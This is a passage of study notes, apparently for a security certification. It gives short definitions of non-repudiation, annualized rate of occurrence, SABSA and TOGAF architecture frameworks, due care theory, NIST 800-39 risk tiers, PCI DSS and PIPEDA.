Restrict users from accessing sensitive information without permission.

Non-repudiation

The security principle of providing proof that a transaction occurred between identified parties. Repudiation occurs when one party in a transaction denies that the transaction took place.

ARO (Annualized Rate of Occurrence)

This is calculated by dividing the number of failures by the number of years between failures. Example: 1 failure every 5 years (1/5 = 0.20, or 20%).

Sherwood Applied Business Security Architecture (SABSA) Framework

Contextual, conceptual, logical, physical, component, and operational levels. Done in phases. Ask what, why, how, who, where, and when at each layer.

Due Care Theory

Focuses on the relative vulnerability of the customer, who has less information and expertise than the firm, and the ethical responsibility that places on the firm.

The Open Group Architecture Framework (TOGAF)

From the Department of Defense. For: business architecture, data architecture, application architecture, technology architecture. Uses the ADM (Architecture Development Method). Analogy: people don't build cities without planning.

NIST 800-39 risk tiers

Organizational tier, business process tier, information systems tier.

PCI DSS

Payment Card Industry Data Security Standard. Protects credit card data; helps prevent identity theft.

PIPEDA

Personal Information Protection and Electronic Documents Act
